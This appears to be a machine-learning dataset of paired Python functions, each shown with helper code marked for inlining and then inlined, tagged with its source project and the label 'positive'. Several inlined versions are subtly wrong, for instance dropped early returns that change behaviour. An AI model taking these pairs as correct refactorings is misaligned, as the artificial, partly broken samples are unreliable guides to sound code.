raise S3ObjectFailure('Failed while downloading %s.' % s3_vars['object'], e)
except SSLError as e:
if x >= s3_vars['retries']:
module.fail_json_aws(e, msg='s3 download failed')
</DeepExtract>
except Sigv4Required:
<DeepExtract>
if module.check_mode:
module.exit_json(msg='GET operation skipped - running in check mode', changed=True)
try:
if s3_vars['version']:
connection_v4.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['obj'], VersionId=s3_vars['version'])
else:
connection_v4.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['obj'])
except is_boto3_error_code(['404', '403']) as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['obj'])
except is_boto3_error_message('require AWS Signature Version 4'):
raise Sigv4Required()
except is_boto3_error_code('InvalidArgument') as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['obj'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Could not find the key %s.' % s3_vars['obj'], e)
optional_kwargs = {'ExtraArgs': {'VersionId': s3_vars['version']}} if s3_vars['version'] else {}
for x in range(0, s3_vars['retries'] + 1):
try:
connection_v4.download_file(s3_vars['bucket'], s3_vars['obj'], s3_vars['dest'], aws_retry=True, **optional_kwargs)
module.exit_json(msg='GET operation complete', changed=True)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
if x >= s3_vars['retries']:
raise S3ObjectFailure('Failed while downloading %s.' % s3_vars['obj'], e)
except SSLError as e:
if x >= s3_vars['retries']:
module.fail_json_aws(e, msg='s3 download failed')
</DeepExtract>
module.exit_json(failed=False)
|
def s3_object_do_get(module, connection, connection_v4, s3_vars):
if module.params.get('sig_v4'):
connection = connection_v4
try:
if s3_vars['version']:
connection.head_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'], VersionId=s3_vars['version'])
else:
connection.head_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'])
except is_boto3_error_code('404'):
keyrtn = False
except is_boto3_error_code('403') as e:
if s3_vars['validate'] is True:
module.fail_json_aws(e, msg='Failed while looking up object (during key check) %s.' % s3_vars['object'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Failed while looking up object (during key check) %s.' % s3_vars['object'], e)
keyrtn = True
if not keyrtn:
if s3_vars['version']:
module.fail_json(msg='Key %s with version id %s does not exist.' % (s3_vars['object'], s3_vars['version']))
module.fail_json(msg='Key %s does not exist.' % s3_vars['object'])
if s3_vars['dest'] and path_check(s3_vars['dest']) and (s3_vars['overwrite'] != 'always'):
if s3_vars['overwrite'] == 'never':
module.exit_json(msg='Local object already exists and overwrite is disabled.', changed=False)
if s3_vars['overwrite'] == 'different' and etag_compare(module, connection, s3_vars['bucket'], s3_vars['object'], version=s3_vars['version'], local_file=s3_vars['dest']):
module.exit_json(msg='Local and remote object are identical, ignoring. Use overwrite=always parameter to force.', changed=False)
if s3_vars['overwrite'] == 'latest' and is_local_object_latest(connection, s3_vars['bucket'], s3_vars['object'], version=s3_vars['version'], local_file=s3_vars['dest']):
module.exit_json(msg='Local object is latest, ignoreing. Use overwrite=always parameter to force.', changed=False)
try:
if module.check_mode:
module.exit_json(msg='GET operation skipped - running in check mode', changed=True)
try:
if s3_vars['version']:
connection.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'], VersionId=s3_vars['version'])
else:
connection.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'])
except is_boto3_error_code(['404', '403']) as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['object'])
except is_boto3_error_message('require AWS Signature Version 4'):
raise Sigv4Required()
except is_boto3_error_code('InvalidArgument') as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['object'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Could not find the key %s.' % s3_vars['object'], e)
optional_kwargs = {'ExtraArgs': {'VersionId': s3_vars['version']}} if s3_vars['version'] else {}
for x in range(0, s3_vars['retries'] + 1):
try:
connection.download_file(s3_vars['bucket'], s3_vars['object'], s3_vars['dest'], aws_retry=True, **optional_kwargs)
module.exit_json(msg='GET operation complete', changed=True)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
if x >= s3_vars['retries']:
raise S3ObjectFailure('Failed while downloading %s.' % s3_vars['object'], e)
except SSLError as e:
if x >= s3_vars['retries']:
module.fail_json_aws(e, msg='s3 download failed')
except Sigv4Required:
if module.check_mode:
module.exit_json(msg='GET operation skipped - running in check mode', changed=True)
try:
if s3_vars['version']:
connection_v4.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['obj'], VersionId=s3_vars['version'])
else:
connection_v4.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['obj'])
except is_boto3_error_code(['404', '403']) as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['obj'])
except is_boto3_error_message('require AWS Signature Version 4'):
raise Sigv4Required()
except is_boto3_error_code('InvalidArgument') as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['obj'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Could not find the key %s.' % s3_vars['obj'], e)
optional_kwargs = {'ExtraArgs': {'VersionId': s3_vars['version']}} if s3_vars['version'] else {}
for x in range(0, s3_vars['retries'] + 1):
try:
connection_v4.download_file(s3_vars['bucket'], s3_vars['obj'], s3_vars['dest'], aws_retry=True, **optional_kwargs)
module.exit_json(msg='GET operation complete', changed=True)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
if x >= s3_vars['retries']:
raise S3ObjectFailure('Failed while downloading %s.' % s3_vars['obj'], e)
except SSLError as e:
if x >= s3_vars['retries']:
module.fail_json_aws(e, msg='s3 download failed')
module.exit_json(failed=False)
|
amazon.aws
|
positive
|
def anonymize_code_str(_code_str):
<DeepExtract>
if not True:
res = ''
temp_string = ''
inside = False
for i in range(len(_code_str)):
if not inside:
res += _code_str[i]
if _code_str[i] == '"':
inside = True
continue
if inside:
if _code_str[i] == '"':
inside = False
if len(temp_string) > 2 and temp_string[0] == ' ' and (temp_string[-1] == ' '):
res += temp_string[1:-1]
else:
res += temp_string
res += '"'
temp_string = ''
else:
temp_string += _code_str[i]
_code_str = res
res = ''
temp_string = ''
inside = False
for i in range(len(_code_str)):
if not inside:
res += _code_str[i]
if _code_str[i] == "'":
inside = True
continue
if inside:
if _code_str[i] == "'":
inside = False
if len(temp_string) > 2 and temp_string[0] == ' ' and (temp_string[-1] == ' '):
res += temp_string[1:-1]
else:
res += temp_string
res += "'"
temp_string = ''
else:
temp_string += _code_str[i]
_code_str = res
</DeepExtract>
(toks, kinds) = c_tokenizer.tokenize(_code_str)
_code_tokenized_deepfix = []
anonymize_dict = defaultdict(list)
for (tok, kind) in zip(toks, kinds):
if kind == 'string':
_code_tokenized_deepfix.append('_<string>_')
anonymize_dict['string'].append(tok)
elif kind == 'number':
_code_tokenized_deepfix.append('_<number>_')
anonymize_dict['number'].append(tok)
elif kind == 'char':
_code_tokenized_deepfix.append('_<char>_')
anonymize_dict['char'].append(tok)
else:
_code_tokenized_deepfix.append(tok)
return (' '.join(_code_tokenized_deepfix), anonymize_dict)
|
def anonymize_code_str(_code_str):
if not True:
res = ''
temp_string = ''
inside = False
for i in range(len(_code_str)):
if not inside:
res += _code_str[i]
if _code_str[i] == '"':
inside = True
continue
if inside:
if _code_str[i] == '"':
inside = False
if len(temp_string) > 2 and temp_string[0] == ' ' and (temp_string[-1] == ' '):
res += temp_string[1:-1]
else:
res += temp_string
res += '"'
temp_string = ''
else:
temp_string += _code_str[i]
_code_str = res
res = ''
temp_string = ''
inside = False
for i in range(len(_code_str)):
if not inside:
res += _code_str[i]
if _code_str[i] == "'":
inside = True
continue
if inside:
if _code_str[i] == "'":
inside = False
if len(temp_string) > 2 and temp_string[0] == ' ' and (temp_string[-1] == ' '):
res += temp_string[1:-1]
else:
res += temp_string
res += "'"
temp_string = ''
else:
temp_string += _code_str[i]
_code_str = res
(toks, kinds) = c_tokenizer.tokenize(_code_str)
_code_tokenized_deepfix = []
anonymize_dict = defaultdict(list)
for (tok, kind) in zip(toks, kinds):
if kind == 'string':
_code_tokenized_deepfix.append('_<string>_')
anonymize_dict['string'].append(tok)
elif kind == 'number':
_code_tokenized_deepfix.append('_<number>_')
anonymize_dict['number'].append(tok)
elif kind == 'char':
_code_tokenized_deepfix.append('_<char>_')
anonymize_dict['char'].append(tok)
else:
_code_tokenized_deepfix.append(tok)
return (' '.join(_code_tokenized_deepfix), anonymize_dict)
|
DrRepair
|
positive
|
def _ref_is_commit(self, ref):
"""Verify that a reference is a valid commit according to git.
This could be a tag, branch, sha1 id, HEAD and potentially others...
Note: values returned by git_showref_* and git_revparse are
shell return codes, which are zero for success, non-zero for
error!
"""
is_commit = False
<DeepExtract>
cmd = ['git', 'rev-parse', '--quiet', '--verify', '{0}^{1}'.format(ref, '{commit}')]
(status, git_output) = execute_subprocess(cmd, status_to_caller=True, output_to_caller=True)
git_output = git_output.strip()
(value, _) = (status, git_output)
</DeepExtract>
if value == 0:
is_commit = True
return is_commit
|
def _ref_is_commit(self, ref):
"""Verify that a reference is a valid commit according to git.
This could be a tag, branch, sha1 id, HEAD and potentially others...
Note: values returned by git_showref_* and git_revparse are
shell return codes, which are zero for success, non-zero for
error!
"""
is_commit = False
cmd = ['git', 'rev-parse', '--quiet', '--verify', '{0}^{1}'.format(ref, '{commit}')]
(status, git_output) = execute_subprocess(cmd, status_to_caller=True, output_to_caller=True)
git_output = git_output.strip()
(value, _) = (status, git_output)
if value == 0:
is_commit = True
return is_commit
|
CESM
|
positive
|
def reduce_dict(input_dict, average=True):
"""
Args:
input_dict (dict): all the values will be reduced
average (bool): whether to do average or sum
Reduce the values in the dictionary from all processes so that process with rank
0 has the averaged results. Returns a dict with the same fields as
input_dict, after reduction.
"""
<DeepExtract>
if not dist.is_available():
world_size = 1
if not dist.is_initialized():
world_size = 1
world_size = dist.get_world_size()
</DeepExtract>
if world_size < 2:
return input_dict
with torch.no_grad():
names = []
values = []
for k in sorted(input_dict.keys()):
names.append(k)
values.append(input_dict[k])
values = torch.stack(values, dim=0)
dist.reduce(values, dst=0)
if dist.get_rank() == 0 and average:
values /= world_size
reduced_dict = {k: v for (k, v) in zip(names, values)}
return reduced_dict
|
def reduce_dict(input_dict, average=True):
"""
Args:
input_dict (dict): all the values will be reduced
average (bool): whether to do average or sum
Reduce the values in the dictionary from all processes so that process with rank
0 has the averaged results. Returns a dict with the same fields as
input_dict, after reduction.
"""
if not dist.is_available():
world_size = 1
if not dist.is_initialized():
world_size = 1
world_size = dist.get_world_size()
if world_size < 2:
return input_dict
with torch.no_grad():
names = []
values = []
for k in sorted(input_dict.keys()):
names.append(k)
values.append(input_dict[k])
values = torch.stack(values, dim=0)
dist.reduce(values, dst=0)
if dist.get_rank() == 0 and average:
values /= world_size
reduced_dict = {k: v for (k, v) in zip(names, values)}
return reduced_dict
|
DynamicRCNN
|
positive
|
def read_readme(file_name):
source_path = os.path.dirname(os.path.realpath(__file__))
if os.path.basename(source_path) == 'tools':
source_path = os.path.dirname(source_path)
elif 'build/bdist' in source_path:
source_path = source_path[:source_path.find('build/bdist')]
absolut_file_name = os.path.join(source_path, file_name)
doc_path = os.path.join(source_path, 'doc', 'sphinx', 'source')
with open(absolut_file_name) as f:
lines = f.readlines()
<DeepExtract>
if included_rst_files is None:
included_rst_files = {}
text = ''
for line in lines:
if line.startswith('.. include::'):
include_file_name = line.split('::')[-1].strip()
if include_file_name not in included_rst_files:
with open(os.path.join(doc_path, include_file_name)) as f:
included_rst_files[include_file_name] = True
text += merge_include(f.readlines(), doc_path, included_rst_files)
else:
text += line
text = text
</DeepExtract>
return text
|
def read_readme(file_name):
source_path = os.path.dirname(os.path.realpath(__file__))
if os.path.basename(source_path) == 'tools':
source_path = os.path.dirname(source_path)
elif 'build/bdist' in source_path:
source_path = source_path[:source_path.find('build/bdist')]
absolut_file_name = os.path.join(source_path, file_name)
doc_path = os.path.join(source_path, 'doc', 'sphinx', 'source')
with open(absolut_file_name) as f:
lines = f.readlines()
if included_rst_files is None:
included_rst_files = {}
text = ''
for line in lines:
if line.startswith('.. include::'):
include_file_name = line.split('::')[-1].strip()
if include_file_name not in included_rst_files:
with open(os.path.join(doc_path, include_file_name)) as f:
included_rst_files[include_file_name] = True
text += merge_include(f.readlines(), doc_path, included_rst_files)
else:
text += line
text = text
return text
|
CodeReview
|
positive
|
def fill_symmetric_const_space(area: int, sp_max: int, n_min: int, n_max: int) -> List[Tuple[int, int]]:
"""Fill the given 1-D area given maximum space spec alone.
The method draws the minimum number of fill blocks needed to satisfy maximum spacing spec.
The given area is filled with the following properties:
1. all spaces are as close to the given space as possible (differ by at most 1),
without exceeding it.
2. the filled area is as uniform as possible.
3. the filled area is symmetric about the center.
4. fill is drawn as much as possible given the above constraints.
fill is drawn such that space blocks abuts both area boundaries.
Parameters
----------
area : int
the 1-D area to fill.
sp_max : int
the maximum space.
n_min : int
minimum fill length.
n_max : int
maximum fill length
Returns
-------
fill_intv : List[Tuple[int, int]]
list of fill intervals.
"""
if n_min > n_max:
raise ValueError('min fill length = %d > %d = max fill length' % (n_min, n_max))
num_fill = -(-(area - sp_max) // (n_max + sp_max))
if num_fill == 0:
return []
blk_len = (area - (num_fill + 1) * sp_max) // num_fill
if blk_len >= n_min:
return fill_symmetric_helper(area, num_fill, sp_max, inc_sp=False, invert=False, fill_on_edge=False, cyclic=False)
(sp_max, remainder) = divmod(area - num_fill * n_min, num_fill + 1)
if n_max > n_min or remainder == 0:
return fill_symmetric_helper(area, num_fill, sp_max, inc_sp=False, invert=False, fill_on_edge=False, cyclic=False)
<DeepExtract>
fill_info = _fill_symmetric_info(area, num_fill + 1, n_max, inc_sp=False, fill_on_edge=True, cyclic=False)
fill_info.invert = True
(sol, num_diff_sp) = fill_symmetric_interval(fill_info)
</DeepExtract>
if num_diff_sp == 0:
return sol
return fill_symmetric_helper(area, num_fill + 2, n_max, inc_sp=False, invert=True, fill_on_edge=True, cyclic=False)
|
def fill_symmetric_const_space(area: int, sp_max: int, n_min: int, n_max: int) -> List[Tuple[int, int]]:
"""Fill the given 1-D area given maximum space spec alone.
The method draws the minimum number of fill blocks needed to satisfy maximum spacing spec.
The given area is filled with the following properties:
1. all spaces are as close to the given space as possible (differ by at most 1),
without exceeding it.
2. the filled area is as uniform as possible.
3. the filled area is symmetric about the center.
4. fill is drawn as much as possible given the above constraints.
fill is drawn such that space blocks abuts both area boundaries.
Parameters
----------
area : int
the 1-D area to fill.
sp_max : int
the maximum space.
n_min : int
minimum fill length.
n_max : int
maximum fill length
Returns
-------
fill_intv : List[Tuple[int, int]]
list of fill intervals.
"""
if n_min > n_max:
raise ValueError('min fill length = %d > %d = max fill length' % (n_min, n_max))
num_fill = -(-(area - sp_max) // (n_max + sp_max))
if num_fill == 0:
return []
blk_len = (area - (num_fill + 1) * sp_max) // num_fill
if blk_len >= n_min:
return fill_symmetric_helper(area, num_fill, sp_max, inc_sp=False, invert=False, fill_on_edge=False, cyclic=False)
(sp_max, remainder) = divmod(area - num_fill * n_min, num_fill + 1)
if n_max > n_min or remainder == 0:
return fill_symmetric_helper(area, num_fill, sp_max, inc_sp=False, invert=False, fill_on_edge=False, cyclic=False)
fill_info = _fill_symmetric_info(area, num_fill + 1, n_max, inc_sp=False, fill_on_edge=True, cyclic=False)
fill_info.invert = True
(sol, num_diff_sp) = fill_symmetric_interval(fill_info)
if num_diff_sp == 0:
return sol
return fill_symmetric_helper(area, num_fill + 2, n_max, inc_sp=False, invert=True, fill_on_edge=True, cyclic=False)
|
bag
|
positive
|
def NLCore_avg(model, in_blob1, in_blob2, in_dim1, in_dim2, latent_dim, num_feat1, num_feat2, prefix, test_mode):
"""Core logic of non-local blocks."""
g = model.ConvNd(in_blob2, prefix + '_g', in_dim2, latent_dim, [1, 1, 1], strides=[1, 1, 1], pads=[0, 0, 0] * 2, **init_params1)
blob_out = model.ReduceMean(g, prefix + '_y', axes=[2])
(blob_out, _) = model.Reshape(blob_out, [blob_out + '_5d', blob_out + '_shape5d'], shape=(-1, latent_dim, 1, 1, 1))
if cfg.FBO_NL.PRE_ACT:
<DeepExtract>
if cfg.FBO_NL.PRE_ACT_LN:
blob_out = model.LayerNorm(blob_out, [blob_out + '_ln', blob_out + '_ln_mean', blob_out + '_ln_std'])[0]
blob_out = model.Relu(blob_out, blob_out + '_relu')
</DeepExtract>
if cfg.FBO_NL.NL_avg_TRANS_OUT:
blob_out = model.ConvNd(blob_out, prefix + '_out', latent_dim, in_dim1, [1, 1, 1], strides=[1, 1, 1], pads=[0, 0, 0] * 2, **init_params2)
if not cfg.FBO_NL.PRE_ACT:
blob_out = model.LayerNorm(blob_out, [prefix + '_ln', prefix + '_ln_mean', prefix + '_ln_std'])[0]
if cfg.FBO_NL.LFB_DROPOUT_ON and (not test_mode):
blob_out = model.Dropout(blob_out, blob_out + '_drop', ratio=cfg.FBO_NL.DROPOUT_RATE, is_test=False)
return blob_out
|
def NLCore_avg(model, in_blob1, in_blob2, in_dim1, in_dim2, latent_dim, num_feat1, num_feat2, prefix, test_mode):
"""Core logic of non-local blocks."""
g = model.ConvNd(in_blob2, prefix + '_g', in_dim2, latent_dim, [1, 1, 1], strides=[1, 1, 1], pads=[0, 0, 0] * 2, **init_params1)
blob_out = model.ReduceMean(g, prefix + '_y', axes=[2])
(blob_out, _) = model.Reshape(blob_out, [blob_out + '_5d', blob_out + '_shape5d'], shape=(-1, latent_dim, 1, 1, 1))
if cfg.FBO_NL.PRE_ACT:
if cfg.FBO_NL.PRE_ACT_LN:
blob_out = model.LayerNorm(blob_out, [blob_out + '_ln', blob_out + '_ln_mean', blob_out + '_ln_std'])[0]
blob_out = model.Relu(blob_out, blob_out + '_relu')
if cfg.FBO_NL.NL_avg_TRANS_OUT:
blob_out = model.ConvNd(blob_out, prefix + '_out', latent_dim, in_dim1, [1, 1, 1], strides=[1, 1, 1], pads=[0, 0, 0] * 2, **init_params2)
if not cfg.FBO_NL.PRE_ACT:
blob_out = model.LayerNorm(blob_out, [prefix + '_ln', prefix + '_ln_mean', prefix + '_ln_std'])[0]
if cfg.FBO_NL.LFB_DROPOUT_ON and (not test_mode):
blob_out = model.Dropout(blob_out, blob_out + '_drop', ratio=cfg.FBO_NL.DROPOUT_RATE, is_test=False)
return blob_out
|
CRCNN-Action
|
positive
|
def execute_transaction(self, txn):
if 'contract' in txn.__dict__:
sid = (txn.sid, txn.contract)
else:
sid = txn.sid
position = self.positions[sid]
position.update(txn)
<DeepExtract>
try:
_ = self._position_amounts[sid]
_ = self._position_last_sale_prices[sid]
except (KeyError, IndexError):
self._position_amounts = self._position_amounts.append(pd.Series({sid: 0.0}))
self._position_last_sale_prices = self._position_last_sale_prices.append(pd.Series({sid: 0.0}))
</DeepExtract>
self._position_amounts[sid] = position.amount
transaction_cost = txn.price * txn.amount
self.cumulative_capital_used += transaction_cost
self.cash_adjustment -= txn.price * txn.amount * get_multiplier(sid)
if math.fabs(self.cumulative_capital_used) > self.max_capital_used:
self.max_capital_used = math.fabs(self.cumulative_capital_used)
<DeepExtract>
self.max_capital_used = int(5000 * round(float(self.max_capital_used) / 5000))
</DeepExtract>
self.max_leverage = 1.1 * self.max_capital_used / self.starting_mav
if self.keep_transactions:
self.processed_transactions[txn.dt].append(txn)
|
def execute_transaction(self, txn):
if 'contract' in txn.__dict__:
sid = (txn.sid, txn.contract)
else:
sid = txn.sid
position = self.positions[sid]
position.update(txn)
try:
_ = self._position_amounts[sid]
_ = self._position_last_sale_prices[sid]
except (KeyError, IndexError):
self._position_amounts = self._position_amounts.append(pd.Series({sid: 0.0}))
self._position_last_sale_prices = self._position_last_sale_prices.append(pd.Series({sid: 0.0}))
self._position_amounts[sid] = position.amount
transaction_cost = txn.price * txn.amount
self.cumulative_capital_used += transaction_cost
self.cash_adjustment -= txn.price * txn.amount * get_multiplier(sid)
if math.fabs(self.cumulative_capital_used) > self.max_capital_used:
self.max_capital_used = math.fabs(self.cumulative_capital_used)
self.max_capital_used = int(5000 * round(float(self.max_capital_used) / 5000))
self.max_leverage = 1.1 * self.max_capital_used / self.starting_mav
if self.keep_transactions:
self.processed_transactions[txn.dt].append(txn)
|
AlephNull
|
positive
|
def im_detect_keypoints(model, im_scale, boxes, blob_conv):
"""Infer instance keypoint poses. This function must be called after
im_detect_bbox as it assumes that the Caffe2 workspace is already populated
with the necessary blobs.
Arguments:
model (DetectionModelHelper): the detection model to use
im_scale (list): image blob scales as returned by im_detect_bbox
boxes (ndarray): R x 4 array of bounding box detections (e.g., as
returned by im_detect_bbox)
Returns:
pred_heatmaps (ndarray): R x J x M x M array of keypoint location
logits (softmax inputs) for each of the J keypoint types output
by the network (must be processed by keypoint_results to convert
into point predictions in the original image coordinate space)
"""
M = cfg.KRCNN.HEATMAP_SIZE
if boxes.shape[0] == 0:
pred_heatmaps = np.zeros((0, cfg.KRCNN.NUM_KEYPOINTS, M, M), np.float32)
return pred_heatmaps
inputs = {'keypoint_rois': _get_rois_blob(boxes, im_scale)}
if cfg.FPN.MULTILEVEL_ROIS:
<DeepExtract>
lvl_min = cfg.FPN.ROI_MIN_LEVEL
lvl_max = cfg.FPN.ROI_MAX_LEVEL
lvls = fpn_utils.map_rois_to_fpn_levels(inputs['keypoint_rois'][:, 1:5], lvl_min, lvl_max)
fpn_utils.add_multilevel_roi_blobs(inputs, 'keypoint_rois', inputs['keypoint_rois'], lvls, lvl_min, lvl_max)
</DeepExtract>
pred_heatmaps = model.module.keypoint_net(blob_conv, inputs)
pred_heatmaps = pred_heatmaps.data.cpu().numpy().squeeze()
if pred_heatmaps.ndim == 3:
pred_heatmaps = np.expand_dims(pred_heatmaps, axis=0)
return pred_heatmaps
|
def im_detect_keypoints(model, im_scale, boxes, blob_conv):
"""Infer instance keypoint poses. This function must be called after
im_detect_bbox as it assumes that the Caffe2 workspace is already populated
with the necessary blobs.
Arguments:
model (DetectionModelHelper): the detection model to use
im_scale (list): image blob scales as returned by im_detect_bbox
boxes (ndarray): R x 4 array of bounding box detections (e.g., as
returned by im_detect_bbox)
Returns:
pred_heatmaps (ndarray): R x J x M x M array of keypoint location
logits (softmax inputs) for each of the J keypoint types output
by the network (must be processed by keypoint_results to convert
into point predictions in the original image coordinate space)
"""
M = cfg.KRCNN.HEATMAP_SIZE
if boxes.shape[0] == 0:
pred_heatmaps = np.zeros((0, cfg.KRCNN.NUM_KEYPOINTS, M, M), np.float32)
return pred_heatmaps
inputs = {'keypoint_rois': _get_rois_blob(boxes, im_scale)}
if cfg.FPN.MULTILEVEL_ROIS:
lvl_min = cfg.FPN.ROI_MIN_LEVEL
lvl_max = cfg.FPN.ROI_MAX_LEVEL
lvls = fpn_utils.map_rois_to_fpn_levels(inputs['keypoint_rois'][:, 1:5], lvl_min, lvl_max)
fpn_utils.add_multilevel_roi_blobs(inputs, 'keypoint_rois', inputs['keypoint_rois'], lvls, lvl_min, lvl_max)
pred_heatmaps = model.module.keypoint_net(blob_conv, inputs)
pred_heatmaps = pred_heatmaps.data.cpu().numpy().squeeze()
if pred_heatmaps.ndim == 3:
pred_heatmaps = np.expand_dims(pred_heatmaps, axis=0)
return pred_heatmaps
|
detectron-self-train
|
positive
|
def test_report(self):
with open(self.tmp_fname, 'wb') as tmp_file:
b_xml.report(self.manager, tmp_file, self.issue.severity, self.issue.confidence)
with open(self.tmp_fname) as f:
<DeepExtract>
d = {ET.XML(f.read()).tag: {} if ET.XML(f.read()).attrib else None}
children = list(ET.XML(f.read()))
if children:
dd = collections.defaultdict(list)
for dc in map(self._xml_to_dict, children):
for (k, v) in dc.items():
dd[k].append(v)
d = {ET.XML(f.read()).tag: {k: v[0] if len(v) == 1 else v for (k, v) in dd.items()}}
if ET.XML(f.read()).attrib:
d[ET.XML(f.read()).tag].update((('@' + k, v) for (k, v) in ET.XML(f.read()).attrib.items()))
if ET.XML(f.read()).text:
text = ET.XML(f.read()).text.strip()
if children or ET.XML(f.read()).attrib:
if text:
d[ET.XML(f.read()).tag]['#text'] = text
else:
d[ET.XML(f.read()).tag] = text
data = d
</DeepExtract>
self.assertEqual(self.tmp_fname, data['testsuite']['testcase']['@classname'])
self.assertEqual(self.issue.text, data['testsuite']['testcase']['error']['@message'])
self.assertEqual(self.check_name, data['testsuite']['testcase']['@name'])
self.assertIsNotNone(data['testsuite']['testcase']['error']['@more_info'])
|
def test_report(self):
with open(self.tmp_fname, 'wb') as tmp_file:
b_xml.report(self.manager, tmp_file, self.issue.severity, self.issue.confidence)
with open(self.tmp_fname) as f:
d = {ET.XML(f.read()).tag: {} if ET.XML(f.read()).attrib else None}
children = list(ET.XML(f.read()))
if children:
dd = collections.defaultdict(list)
for dc in map(self._xml_to_dict, children):
for (k, v) in dc.items():
dd[k].append(v)
d = {ET.XML(f.read()).tag: {k: v[0] if len(v) == 1 else v for (k, v) in dd.items()}}
if ET.XML(f.read()).attrib:
d[ET.XML(f.read()).tag].update((('@' + k, v) for (k, v) in ET.XML(f.read()).attrib.items()))
if ET.XML(f.read()).text:
text = ET.XML(f.read()).text.strip()
if children or ET.XML(f.read()).attrib:
if text:
d[ET.XML(f.read()).tag]['#text'] = text
else:
d[ET.XML(f.read()).tag] = text
data = d
self.assertEqual(self.tmp_fname, data['testsuite']['testcase']['@classname'])
self.assertEqual(self.issue.text, data['testsuite']['testcase']['error']['@message'])
self.assertEqual(self.check_name, data['testsuite']['testcase']['@name'])
self.assertIsNotNone(data['testsuite']['testcase']['error']['@more_info'])
|
bandit
|
positive
|
def PUT(self, req, rep):
<DeepExtract>
req['client_id'] = 'test'
req['path'] = '/'.join([''] + req.get('trail', []))
if self.authz.handle(req) is False:
raise HTTPError(403)
</DeepExtract>
self.secrets.PUT(req, rep)
|
def PUT(self, req, rep):
req['client_id'] = 'test'
req['path'] = '/'.join([''] + req.get('trail', []))
if self.authz.handle(req) is False:
raise HTTPError(403)
self.secrets.PUT(req, rep)
|
custodia
|
positive
|
def __dict__(self):
"""
prepares a dictionary to return for jsonification with the api
"""
mode = self.mode
sources = {}
edges = []
<DeepExtract>
self._mode = DRSMode.FIELDS
</DeepExtract>
for x in self:
table = x.source_name
if not sources.get(table, None):
source_res = x.__dict__()
sources[table] = {'source_res': source_res, 'field_res': []}
sources[table]['field_res'].append(x.__dict__())
for edge in self.get_provenance().prov_graph().edges():
origin = edge[0].__dict__()
destination = edge[1].__dict__()
edges.append((origin, destination))
self._mode = mode
return {'sources': sources, 'edges': edges}
|
def __dict__(self):
"""
prepares a dictionary to return for jsonification with the api
"""
mode = self.mode
sources = {}
edges = []
self._mode = DRSMode.FIELDS
for x in self:
table = x.source_name
if not sources.get(table, None):
source_res = x.__dict__()
sources[table] = {'source_res': source_res, 'field_res': []}
sources[table]['field_res'].append(x.__dict__())
for edge in self.get_provenance().prov_graph().edges():
origin = edge[0].__dict__()
destination = edge[1].__dict__()
edges.append((origin, destination))
self._mode = mode
return {'sources': sources, 'edges': edges}
|
aurum-datadiscovery
|
positive
|
def _set_fields(self, val):
<DeepExtract>
if 'fields' in 'field_names':
self._validate_field_names(val)
elif 'fields' in ('start', 'end', 'max_width', 'padding_width', 'left_padding_width', 'right_padding_width', 'format'):
self._validate_nonnegative_int('fields', val)
elif 'fields' in 'sortby':
self._validate_field_name('fields', val)
elif 'fields' in 'sort_key':
self._validate_function('fields', val)
elif 'fields' in 'hrules':
self._validate_hrules('fields', val)
elif 'fields' in 'vrules':
self._validate_vrules('fields', val)
elif 'fields' in 'fields':
self._validate_all_field_names('fields', val)
elif 'fields' in ('header', 'border', 'reversesort', 'xhtml', 'print_empty'):
self._validate_true_or_false('fields', val)
elif 'fields' in 'header_style':
self._validate_header_style(val)
elif 'fields' in 'int_format':
self._validate_int_format('fields', val)
elif 'fields' in 'float_format':
self._validate_float_format('fields', val)
elif 'fields' in ('vertical_char', 'horizontal_char', 'junction_char'):
self._validate_single_char('fields', val)
elif 'fields' in 'attributes':
self._validate_attributes('fields', val)
else:
raise Exception('Unrecognised option: %s!' % 'fields')
</DeepExtract>
self._fields = val
|
def _set_fields(self, val):
if 'fields' in 'field_names':
self._validate_field_names(val)
elif 'fields' in ('start', 'end', 'max_width', 'padding_width', 'left_padding_width', 'right_padding_width', 'format'):
self._validate_nonnegative_int('fields', val)
elif 'fields' in 'sortby':
self._validate_field_name('fields', val)
elif 'fields' in 'sort_key':
self._validate_function('fields', val)
elif 'fields' in 'hrules':
self._validate_hrules('fields', val)
elif 'fields' in 'vrules':
self._validate_vrules('fields', val)
elif 'fields' in 'fields':
self._validate_all_field_names('fields', val)
elif 'fields' in ('header', 'border', 'reversesort', 'xhtml', 'print_empty'):
self._validate_true_or_false('fields', val)
elif 'fields' in 'header_style':
self._validate_header_style(val)
elif 'fields' in 'int_format':
self._validate_int_format('fields', val)
elif 'fields' in 'float_format':
self._validate_float_format('fields', val)
elif 'fields' in ('vertical_char', 'horizontal_char', 'junction_char'):
self._validate_single_char('fields', val)
elif 'fields' in 'attributes':
self._validate_attributes('fields', val)
else:
raise Exception('Unrecognised option: %s!' % 'fields')
self._fields = val
|
C--Compiler
|
positive
|
def format_unencoded(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
For our implementation we put all lines in their own 'line group'.
"""
x = self.xoffset
y = self.yoffset
if not self.nowrap:
if self.encoding:
outfile.write('<?xml version="1.0" encoding="%s"?>\n' % self.encoding)
else:
